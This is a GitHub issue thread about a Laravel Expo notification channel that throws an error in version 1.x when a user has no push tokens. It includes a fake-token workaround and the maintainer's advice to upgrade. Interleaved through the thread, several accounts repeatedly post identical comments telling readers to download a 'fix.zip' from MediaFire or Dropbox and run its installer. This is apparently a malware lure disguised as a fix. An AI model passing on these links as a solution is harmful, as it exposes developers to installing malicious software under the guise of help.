### ISSUE TITLE
Throws error in 1.x when empty array

### ISSUE THREAD

**Issue by robertmylne** [laravel-notification-channels/expo#18]
Some users won't have tokens yet, therefore an empty array is returned from `routeNotificationForExpo`. However, having an empty array throws an error `Notifiable of class: App\Models\User routeNotificationFor() method did not return a valid Expo Push Token` killing all other channels in said notification such as the database notifications which are still required. The only way around this is to add a fake token to the array to stop throwing the error. Is there a better solution for this?

```
    public function routeNotificationForExpo(): array
    {
        $tokens = $this->devices->pluck('token')->toArray() ?? [];

        // Hack to circumvent error
        return array_merge($tokens, ['ExponentPushToken[xxxxxxxxxxxxxxxxxxxxxx]']);
    }
```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by dwightwatson** [comment]
I think the best bet would be to upgrade to 2.x. We're unlikely to fix any outstanding issues on 1.x because 2.x was a substantial change.

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by robertmylne** [comment]
That would require upgrading to Laravel 11. Which isn't an option right now. Thank you though for your quick response. I will just stick to the workout around I have for now, hopefully that will help anyone else who runs into this issue.

**Comment by dwightwatson** [comment]
No worries - I hope you get to Laravel 11 eventually! 🙂

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
